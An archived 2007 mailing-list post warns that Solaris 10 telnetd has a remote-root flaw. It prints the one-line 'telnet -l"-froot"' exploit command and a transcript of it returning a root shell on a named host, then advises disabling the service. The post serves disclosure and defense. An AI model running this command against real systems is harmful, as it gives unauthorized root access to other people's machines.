[geeks] Solaris 10 Remote-Root Exploit

Jonathan C. Patschke jp at celestrion.net
Mon Feb 12 07:45:40 CST 2007


Just saw this on Slashdot:

   http://riosec.com/solaris-telnet-0-day

And verified that it works:

   [jp at cobra:~]$ telnet -l"-froot" lic4
   Trying 10.10.100.120...
   Connected to lic4.centtech.com.
   Escape character is '^]'.
   Last login: Wed Jan 17 16:53:28 from hal10.centtech.
   Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
   You have mail.
   # Connection closed by foreign host.
   [jp at cobra:~]$ exit
   Connection to cobra.centtech.com closed.

If you have any public-facing systems running Solaris's telnetd, you
should disable it now.  Even turning off remote root logins is
insufficient, since this seems to bypass PAM.

-- 
Jonathan Patschke ) "I would buy a Mac today if I was not working at
Elgin, TX        (   Microsoft."      --Jim Allchin, VP of Platforms



More information about the geeks mailing list